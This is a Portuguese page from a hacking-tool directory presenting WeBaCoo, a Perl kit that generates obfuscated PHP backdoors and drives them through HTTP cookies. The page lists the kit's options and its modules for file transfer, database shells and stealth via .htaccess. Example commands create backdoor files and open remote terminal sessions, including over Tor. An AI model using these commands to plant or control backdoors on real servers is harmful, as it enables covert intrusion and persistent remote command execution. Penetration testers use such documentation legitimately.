Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WeBaCoo — Kit de Scripts de Backdoor Web via Cookies | Kitploit
Ferramentas/GitHubGitHub/anestisb/webacoo
Geração de PayloadsSegurança WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubanestisb/webacoo

WeBaCoo

Kit de Scripts de Backdoor Web via Cookies

Ver Repositório
18642há 14 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \ \ /\ / __/ |/ / (
| | _/\ () | (_) | / / _
_/ _,|_/_/ _/

root@kitploit:~
 Web Backdoor Cookie Script-Kit

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Escrito por: Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis

Aviso

A ferramenta é apenas para fins de teste e só pode ser usada onde houver consentimento estrito. Não a utilize para fins ilegais.

Licença

Quaisquer modificações, alterações ou mudanças nesta aplicação são aceitáveis, no entanto, qualquer lançamento público que utilize este código deve ser aprovado pelo seu criador. Verifique o arquivo LICENSE para mais informações.

Requisitos

  • perl instalado
  • liburi-perl
  • libio-socket-socks-perl

Se não desejar instalar o "libio-socket-socks-perl" para o recurso de proxy Tor, comente a linha 25 no webacoo.pl

Uso

webacoo.pl [options]

Opções: -g Gera código de backdoor (-o é obrigatório)

-f FUNCTION Função do sistema PHP a usar FUNCTION 1: system (padrão) 2: shell_exec 3: exec 4: passthru 5: popen

-o OUTPUT Nome do arquivo de saída do backdoor gerado

-r Retorna o código do backdoor sem ofuscação

-t Estabelece conexão remota "terminal" (-u é obrigatório)

-u URL URL do backdoor

-e CMD Modo de execução de comando único (-t e -u são obrigatórios)

-m METHOD Método HTTP a ser usado (padrão é "GET")

-c C_NAME Nome do cookie (padrão: "M-cookie")

-d DELIM Delimitador (padrão: Novo aleatório para cada requisição)

-a AGENT Cabeçalho HTTP user-agent (padrão existe)

-p PROXY Usar proxy (tor, ip:porta ou usuário:senha:ip:porta)

-v LEVEL Nível de verbosidade LEVEL 0: nenhuma informação adicional (padrão) 1: imprime cabeçalhos HTTP 2: imprime cabeçalhos HTTP + dados

-l LOG Registrar atividade em arquivo

-h Exibe ajuda e sai

update Verifica atualizações e aplica se houver

Módulos de Extensão

Desde a versão 0.2.1, foi adicionado suporte a módulos de extensão para fornecer funcionalidades extras ao WeBaCoo. No modo terminal, você pode executar 'load' para listar os módulos disponíveis e inicializar o desejado a partir da lista. Ao digitar 'unload', você pode retornar ao modo terminal inicial.

Módulos de extensão disponíveis: o mysql-cli Módulo de linha de comando MySQL o psql-cli Módulo de linha de comando Postgres o upload Módulo de upload de arquivo usando HTTP Post o download Módulo de download de arquivo usando saída padrão via 'od' & 'xxd' o stealth Módulo para aumentar o sigilo via manipulação de .htaccess

Exemplos

  1. Cria 'backdoor.php' backdoor ofuscado com configurações padrão ./webacoo.pl -g -o backdoor.php

  2. Cria 'raw-backdoor.php' backdoor sem ofuscação usando a função 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r

  3. Estabelece conexão "terminal" com o host remoto usando a configuração padrão ./webacoo.pl -t -u http://127.0.0.1/backdoor.php

  4. Estabelece conexão "terminal" com o host remoto enquanto define alguns argumentos ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"

  5. Estabelece conexão "terminal" com o host remoto através de proxy http local ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

  6. Estabelece conexão "terminal" com o host remoto através de proxy http com autenticação básica ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

  7. Estabelece conexão "terminal" com o host remoto via Tor e registra atividade ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

Baixar ferramenta